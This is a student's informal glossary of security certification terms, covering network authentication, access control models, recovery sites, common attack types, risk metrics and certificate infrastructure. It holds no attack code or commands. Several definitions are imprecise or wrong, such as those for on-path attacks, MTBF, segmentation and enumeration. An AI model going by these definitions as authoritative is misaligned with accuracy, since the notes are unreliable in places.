terms i dont know

SIEM

security information event manager, collects and analyzes log data from across an organizations IT environment to manage security threats in real time

802.1x

provides a secure way to authenticate users and devices before granting them access to a network. uses a centralized authentication server, and this allows all users to use their corporate credentials during the login process.

EAP

a security framework that supports authentication methods such as certificates or passwords, often used in Wi-Fi via 802.1x standard. An authentication framework commonly associated with network access control

on-path

when an attacker intercepts communication between two parties to eavesdrop, steal data, or alter the conversation. Can redirect traffic, ARP poisoning. specifically has to do with certificates

DoS

Denial of service, prevents communication to a server and most likely provides a timeout error

Key Escrow

describes the storage and management of decryption keys by a third-party

segmentation

describes the separation of user data from company data

cold-site recovery

the most simplistic recovery site. consists of power, networking capability, and cooling. doesnt have hardware elements such as servers and storage

warm-site recovery

all the elements of a cold site + some, doesnt have data available

hot-site recovery

a fully functional backup site that has important data mirrored onto it

PSK

(Pre-Shared Key) is a wireless configuration option that allows everyone on the network to use the same access key or password when connecting to the wireless network.

WPA3

(Wi-Fi Protected Access 3) is an encryption protocol used on wireless networks. All data sent over a WPA3-protected wireless network will be encrypted.

Posture assessment

evaluates the configuration of a system to ensure all configurations and applications are up to date and secure as possible.

discretionary

an authorization method where the owner of the data determines the scope and type of access. If a user creates a spreadsheet, the user can then assign users and groups to have a particular level of access to that spreadsheet.

mandatory

uses a series of security levels (i.e., public, private, secret) and assigns those levels to each object in the operating system. Users are assigned a security level, and they would only have access to objects that meet or are below that assigned security level.

rule-based

determines access based on a series of system- enforced rules. An access rule might require a particular browser be used to complete a web page form, or access to a file or system is only allowed during certain times of the day.

role-based

assigns a user’s permissions based on their role in the organization. For example, a manager would have a different set of rights and permissions than a team lead.

deauthentication

attacks are commonly associated with wireless networks, and they usually cause disconnects and lack of connectivity

Buffer overflow

are associated with application attacks and can cause applications to crash or act in unexpected ways. can be manipulated to execute code on the remote device.

Dns poisoning

can modify a DNS server to modify the IP address provided during the name resolution process. If an attacker modifies the DNS information, they can direct client computers to any destination IP address.

SQL injection

takes advantage of poor input validation to circumvent the application and allows the attacker to query the database directly.

DNS filtering

uses a database of known malicious websites to resolve an incorrect or null IP address. If a user attempts to visit a known malicious site, the DNS resolution will fail and the user will not be able to visit the website.

honeynet

non-production network created to attract attackers.

SCADA

Supervisory Control and Data Acquisition

VLAN

Virtual Local Area Networks. segments a single physical network into multiple separate broadcast domains, grouping devices (like computers, servers) into virtual networks regardless of their physical location for better security,

Zero-day

attackers search for unknown vulnerabilities. They create exploits against these vulnerabilities. The vendor has no idea the vulnerability exists – They don’t have a fix for an unknown problem

NGFW

Next-Generation Firewall

key stretching

uses a cryptographic key multiple times for additional protection against brute force attacks.

SCAP

Security Content Automation Protocol

passive reconnaissance

gathering information about a target (person, organization, network) from public sources without directly interacting with them, making it stealthy and undetectable, like using Google, social media, or public records

DMARC

Domain-based Message Authentication, Reporting, and Conformance) is an email authentication protocol. specifies the disposition of spam emails

SPF

Sender Policy Framework. an email authentication protocol that prevents spoofing and phishing by letting domain owners specify which mail servers are authorized to send emails for their domain

CA

Certificate Authority - An organization that issues and verifies digital certificates to confirm the identity of websites, users, or devices.

MTBF

Mean Time Between Failures is a reliability metric measuring the average time a repairable system operates between security incidents or failures

RTO

Recovery Time Objective is the maximum acceptable time an organization can tolerate a system or service being down after a cyberattack or disaster before significant business harm occurs

MTTR

Mean time to respond, measuring the average time it takes to fix a security issue

RPO

Recovery Point Objective. the maximum acceptable amount of data loss, measured in time (e.g., 1 hour, 1 day), that an organization can tolerate after a disruptive event like a cyberattack or system failure, dictating how frequently data backups must occur to meet business continuity needs

MOA

Memorandum of Agreement, a formal document between two or more organizations defining a cooperative relationship

SLA

Service Level Agreement. binding contract detailing specific service performance metrics, availability, and remedies for failure

SOW

Statement of Work. details specific projects, deliverables, timelines, and costs within that framework

Race Condition

a programming issue where a portion of the application is making changes not seen by other parts of the application. two different application processes are executing simultaneously.

Record Encryption

secures individual data entries (records) within a database or file, scrambling them into unreadable code (ciphertext) using unique keys

Journaling

logging system or application activities (like file changes, database updates, or emails) in a sequential record (a "journal") to ensure data integrity, enable recovery after crashes, and create audit trails for security analysis

MDM

Mobile Device Management, a solution that lets organizations remotely control, secure, and manage mobile devices

COPE

Corporate-Owned, Personally Enabled, a mobile device strategy where the company provides devices (phones, laptops) but allows employees limited personal use, balancing corporate security control

Configuration Enforcement

fixes the problems after a posture assessment

business continuity

define the procedures used when the primary business systems are unavailable.

development lifecycle

defines the specific policies associated with the design, development, testing, deployment, and maintenance of the application development process.

acceptable use policy

formally defines the proper use of company assets and technology devices.

risk register

identifies and documents the risks associated with each step of a project plan

risk transfer

Some organizations will transfer their risk to a third-party. For example, many organizations will purchase cybersecurity insurance to minimize the financial impact of a cybersecurity event.

backout plan

provides information on reverting to the previous configuration if an unrecoverable error is found during the change.

replay attack

captures information and then replays that information as the method of attack

privilege escalation attack

allows a user to exceed their normal rights and permissions.

jailbreaking

replaces the firmware on a mobile device to gain access to features not normally available in the operating system.

capacity planning

used to determine how many resources would be required for a particular task

load balancing

used to distribute transactions across multiple systems.

spraying attack

often uses accounts passwords stolen from other sites or a short list of the most common passwords, limits the number of attempts to prevent alerts or an account lockout.

UPS

Uninterruptible Power Supply

secure enclave

a protected area for secret information, and is often implemented as a hardware processor in a device.

blockchain

can be used to track or verify components, digital media, votes, and other physical or digital objects.

audit committee

oversees the risk management activities for an organization.

right-to-audit clause

often included in a third-party contract to define the terms and conditions around periodic audits. This is often part of a larger product or services contract.

enumeration

describes the detailed listing of all parts in a particular device.

sanitization

deletes data from storage media and allows the storage device to be used in the future.

certification

If a third-party is providing destruction services, they often will certify the work and document which device serial numbers were destroyed as part of their service.

cross-site scripting

allows a third party to take advantage of the trust a browser might have with another website.

host-based firewall

a firewall that runs on an individual device (like a laptop, server, or workstation) rather than on the network.

air-gapped network

a network that is physically isolated from all other networks, including the internet.

RTOS

(Real-time Operating System) is an OS designed for industrial equipment, automobiles, and other time-sensitive applications

CRL

(Certificate Revocation List) is used to determine if a certificate has been administratively revoked.

Data custodian

manages access rights and sets security controls to the data.

Data processor

manages the operational use of the data, but not the rights and permissions to the information.

TPM

(Trusted Platform Module) is used on individual devices to provide cryptographic functions and securely store encryption keys. Not for web server private keys.

HSM

(Hardware Security Module) is a high-end cryptographic hardware appliance that can securely store keys and certificates for all devices.

SLE

(Single Loss Expectancy) describes the financial impact of a single event.

UEFI

(Unified Extensible Firmware Interface) is the modern replacement for the old BIOS firmware that starts your computer before the operating system loads.

ALE

(Annual Loss Expectancy) is the financial loss over an entire 12-month period.

ARO

(Annualized Rate of Occurrence) is the number of times an event will occur in a 12-month period.

Logic Bomb

is malware that installs and operates silently until a certain event occurs. Once it has been triggered, the results usually involve loss of data or a disabled operating system.

DLP

(Data Loss Prevention) technologies can identify and block the transmission of sensitive data across the network.

IPS

(Intrusion Prevention System) signatures are useful for identifying known vulnerabilities

RADIUS

(Remote Authentication Dial-In User Service) is an authentication protocol commonly used to validate user credentials.

IPsec

(Internet Protocol Security) is a protocol suite for authenticating and encrypting network communication.

CSR

Certificate Signing Request. A file generated by a server or device that contains its public key and identifying information, sent to a CA to request a certificate.

OCSP

Online Certificate Status Protocol. A real-time method for checking whether a certificate is valid or revoked without downloading the entire CRL.

OSINT

Any intelligence gathered from publicly available sources (can be used for cybersecurity, marketing, investigations, etc.).

Log aggregation

a method of centralizing evidence and log files for reporting and future analysis.

SDN

(Software Defined Networking) separates the planes of operation so that infrastructure devices would have a defined control plane and data plane. This allows for more automation and dynamic changes to the infrastructure.

Wireless Deauthentication

would cause users on a wireless network to constantly disconnect.

Partially Known Environment

when the attacker knows some information about the victim, but not all information is available.

Benchmarks

a set of best practices to apply to an application, operating system, or any other service.

DKIM

(Domain Keys Identified Mail) record is a DNS (Domain Name System) entry that includes the public key associated with an email server's digital signatures.

Jump Server

a highly secured device commonly used to access secure areas of another network.

Tokenization

replaces sensitive data with a non-sensitive placeholder.

AAA

(Authentication, Authorization, and Accounting) is a common method of centralizing authentication. Instead of having separate local accounts on different devices, users can authenticate with account information maintained in a centralized database.

Insecure Protocols

will transmit information "in the clear," or without any type of encryption or protection.

Packet Capture

the act of collecting and analyzing network packets to understand or troubleshoot network activity.

Wireshark

captures packets in real time and lets you inspect every detail—IPs, ports, protocols, payloads, etc. Helps with troubleshooting, malware analysis, detecting attacks, and learning how protocols work.

Statement of Work

used during a professional services engagement to detail a list of specific tasks to complete.